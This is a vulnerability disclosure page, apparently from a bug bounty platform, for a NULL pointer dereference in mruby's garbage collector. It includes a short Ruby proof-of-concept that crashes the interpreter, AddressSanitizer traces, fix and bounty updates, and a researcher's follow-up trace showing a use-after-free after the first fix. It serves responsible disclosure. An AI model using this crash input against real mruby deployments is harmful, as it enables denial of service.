NULL Pointer Dereference in mruby/mruby

Valid

Reported on

Dec 10th 2021


Description

NULL Pointer Dereference in mrb_full_gc

Proof of Concept

( *a = () )
a.<<.take_while{ a.drop_while {Enumerable ; a<<lambda {}}}

Result

./master/asan_mruby/bin/mirb ./crash.rb
mirb - Embeddable Interactive Ruby Shell

 => nil
AddressSanitizer:DEADLYSIGNAL
=================================================================
==21352==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x556b44382444 bp 0x7fff4e9961d0 sp 0x7fff4e9961b0 T0)
==21352==The signal is caused by a READ memory access.
==21352==Hint: address points to the zero page.
    #0 0x556b44382443 in mrb_full_gc /root/master/asan_mruby/src/gc.c:1317
    #1 0x556b4438276b in mrb_garbage_collect /root/master/asan_mruby/src/gc.c:1350
    #2 0x556b44386737 in mrb_irep_incref /root/master/asan_mruby/src/state.c:114
    #3 0x556b4444780a in mrb_proc_copy /root/master/asan_mruby/src/proc.c:213
    #4 0x556b44448162 in proc_lambda /root/master/asan_mruby/src/proc.c:284
    #5 0x556b4439f98c in mrb_vm_exec /root/master/asan_mruby/src/vm.c:1637
    #6 0x556b44391018 in mrb_vm_run /root/master/asan_mruby/src/vm.c:1091
    #7 0x556b443034eb in main /root/master/asan_mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:670
    #8 0x7f192ee230b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #9 0x556b4430048d in _start (/root/master/asan_mruby/bin/mirb+0xbe48d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/master/asan_mruby/src/gc.c:1317 in mrb_full_gc
==21352==ABORTING
We are processing your report and will contact the mruby team within 24 hours. a year ago
We have contacted a member of the mruby team and are waiting to hear back a year ago
Yukihiro "Matz" Matsumoto validated this vulnerability a year ago
felling good man has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto marked this as fixed in 3.1 with commit f5e10c a year ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
This vulnerability will not receive a CVE
felling
a year ago

Researcher


Hi @Matz, Look like your fix is incomplete.

mruby/bin/mirb test.rb
mirb - Embeddable Interactive Ruby Shell

 => nil
too many irep references (RuntimeError)
=================================================================
==4326==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000003a6 at pc 0x555880ee8b49 bp 0x7ffd45311cb0 sp 0x7ffd45311ca0
READ of size 1 at 0x6070000003a6 thread T0
    #0 0x555880ee8b48 in mrb_irep_cutref /root/master/asan_mruby/src/state.c:138
    #1 0x555880ee2170 in obj_free /root/master/asan_mruby/src/gc.c:871
    #2 0x555880edf78c in free_heap /root/master/asan_mruby/src/gc.c:433
    #3 0x555880edf7e4 in mrb_gc_destroy /root/master/asan_mruby/src/gc.c:442
    #4 0x555880ee928d in mrb_close /root/master/asan_mruby/src/state.c:195
    #5 0x555880e659c6 in main /root/master/asan_mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:713
    #6 0x7fa03c6cd0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #7 0x555880e6248d in _start (/root/master/asan_mruby/bin/mirb+0xbf48d)

0x6070000003a6 is located 6 bytes inside of 72-byte region [0x6070000003a0,0x6070000003e8)
freed by thread T0 here:
    #0 0x7fa03caf47cf in __interceptor_free (/lib/x86_64-linux-gnu/libasan.so.5+0x10d7cf)
    #1 0x555880ee87a3 in mrb_default_allocf /root/master/asan_mruby/src/state.c:64
    #2 0x555880edeb69 in mrb_free /root/master/asan_mruby/src/gc.c:288
    #3 0x555880ee9198 in mrb_irep_free /root/master/asan_mruby/src/state.c:174
    #4 0x555880ee8af7 in mrb_irep_decref /root/master/asan_mruby/src/state.c:128
    #5 0x555880ee2183 in obj_free /root/master/asan_mruby/src/gc.c:873
    #6 0x555880edf78c in free_heap /root/master/asan_mruby/src/gc.c:433
    #7 0x555880edf7e4 in mrb_gc_destroy /root/master/asan_mruby/src/gc.c:442
    #8 0x555880ee928d in mrb_close /root/master/asan_mruby/src/state.c:195
    #9 0x555880e659c6 in main /root/master/asan_mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:713
    #10 0x7fa03c6cd0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)

previously allocated by thread T0 here:
    #0 0x7fa03caf4ffe in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dffe)
    #1 0x555880ee87bd in mrb_default_allocf /root/master/asan_mruby/src/state.c:68
    #2 0x555880ede83e in mrb_realloc_simple /root/master/asan_mruby/src/gc.c:226
    #3 0x555880ede940 in mrb_realloc /root/master/asan_mruby/src/gc.c:240
    #4 0x555880edea2d in mrb_malloc /root/master/asan_mruby/src/gc.c:256
    #5 0x555880ee931a in mrb_add_irep /root/master/asan_mruby/src/state.c:208
    #6 0x555880f69f00 in scope_add_irep /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3641
    #7 0x555880f6a361 in scope_new /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3671
    #8 0x555880f592b8 in lambda_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1294
    #9 0x555880f5f870 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2261
    #10 0x555880f5be84 in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1708
    #11 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
    #12 0x555880f5b006 in gen_values /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1563
    #13 0x555880f5ba5c in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1668
    #14 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
    #15 0x555880f5e794 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2126
    #16 0x555880f5a5ef in lambda_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1456
    #17 0x555880f5f870 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2261
    #18 0x555880f5be84 in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1708
    #19 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
    #20 0x555880f5e794 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2126
    #21 0x555880f5a5ef in lambda_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1456
    #22 0x555880f5f870 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2261
    #23 0x555880f5be84 in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1708
    #24 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
    #25 0x555880f5e794 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2126
    #26 0x555880f5a801 in scope_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1473
    #27 0x555880f612ae in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2494
    #28 0x555880f6c43d in generate_code /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3888
    #29 0x555880f6c815 in mrb_generate_code /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3911

SUMMARY: AddressSanitizer: heap-use-after-free /root/master/asan_mruby/src/state.c:138 in mrb_irep_cutref
Shadow bytes around the buggy address:
  0x0c0e7fff8020: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fd fd
  0x0c0e7fff8030: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
  0x0c0e7fff8040: fd fd fd fd fd fa fa fa fa fa fd fd fd fd fd fd
  0x0c0e7fff8050: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c0e7fff8060: fd fa fa fa fa fa fd fd fd fd fd fd fd fd fd fa
=>0x0c0e7fff8070: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fa fa fa
  0x0c0e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==4326==ABORTING
Robert Scott
9 months ago

@matz can confirm this is still not fixed in 3.1.0-rc2

Robert Scott
9 months ago

^ Disregard this. What presumably happened is the followup to this became https://huntr.dev/bounties/59a70392-4864-4ce3-8e35-6ac2111d1e2e/

to join this conversation